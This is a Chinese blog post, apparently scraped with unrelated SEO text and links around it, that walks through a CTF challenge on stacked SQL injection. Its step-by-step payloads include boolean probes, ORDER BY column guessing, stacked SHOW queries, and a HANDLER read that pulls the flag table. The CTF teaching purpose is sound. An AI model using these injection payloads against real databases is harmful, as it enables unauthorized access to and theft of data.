当前位置: 首页 > news >正文

博客网站建设的流程做钢材生意一般做什么网站好

博客网站建设的流程,做钢材生意一般做什么网站好,网站建设中的html页面下载,高端品牌网站建设明细报价报在一次联系CTF赛题中才了解到堆叠注入,在这里简单介绍一下。 堆叠注入的原理什么的一搜一大堆,我就不引用百度了,直接进入正题。 这个是攻防世界的一道CTF赛题。 采用寻常思路来寻找sql注入漏洞。 payload:1 and 11-- 利用payload: and 12…

在一次联系CTF赛题中才了解到堆叠注入,在这里简单介绍一下。

堆叠注入的原理什么的一搜一大堆,我就不引用百度了,直接进入正题。

这个是攻防世界的一道CTF赛题。

采用寻常思路来寻找sql注入漏洞。

payload:1' and 1=1--+

 

 

利用payload:' and 1=2--+

可以确定用户输入的内容被带入到数据库中查询了,那么就可以确定这个位置有注入漏洞。

接下来就是手工注入的常见思路,利用order by来猜列。

payload:' order by 1--+

在这里我们可以猜测有两列数据。

那么接下来利用union select 进行查询

 

发现对关键字都进行了过滤,那么接下来想用常规思路得到数据是不可能了,就利用堆叠注入。

 

 

payload:1';show databases;--+

 

payload:' ;show tables;--+

看到一个及其奇怪的表。

 

在这发现了flag,这里查询的时候注意一下,需要用``把表名括起来。

 

payload:';handler `1919810931114514` open;handler `1919810931114514` read first;--+

在这里大家额外补充一下关于mysql中handler的知识点,我也是现查的。

附一个学习链接:【MySQL】MySQL 之 handler 的详细使用及说明 - 灰信网(软件开发博客聚合) 

 

 

 

http://www.yayakq.cn/news/501478/

相关文章:

  • html 网站源码 卖手机搜索引擎优化技术
  • cms企业网站单页 网站 模板
  • 网站推广方式措施做设计去哪些网站下载素材
  • 哪些网站可以做ppt如何自学网站开发
  • 东山县建设银行网站python做网站好不好
  • 云主机 网站吗免费免费建站
  • 金华网站建设方案报价山东网站建设电话
  • 大丰网站建设公司网站源码带后台
  • 小说网站开发中遇到的问题帮人做兼职的网站
  • 宿州网站制作公司企业网站推广
  • 量个网站一个域名高端自适应网站开发
  • 苏州网站设计公司兴田德润怎么样php+做网站
  • 优质视频素材网站南宁网站制作工具
  • dream网站怎么做框架未来网站开发需求多
  • 箱包商城网站建设公司注册信息怎么查
  • 做网站推广见客户的话术wordpress 淡入特效
  • 福州网站改版哪家好前端和后端哪个难
  • 网站开发应该先写前端还是后端兰州网站建设ulezhi
  • 做ppt做好的网站选择网站建设系统
  • 做女装的网站wordpress批量上传
  • 网站建设费分录一个网站的制作特点
  • 设计工作室与网站建设工作室国企ui设计招聘信息
  • 网站开发从零到上线栅格系统做的网站
  • 网站怎么在百度做推广建设一个下载网站
  • 网站没备案做淘宝客网站建设使用工具
  • 外贸网站建设视频网站建设 网页设计
  • 个人建网站需要什么手续酒店如何做网络营销
  • 网站开发前端就业前景c2c商城网站开发
  • 珠海网站建设哪家专业公司静态网站模板
  • typecho前端建站工具烟台高新区网站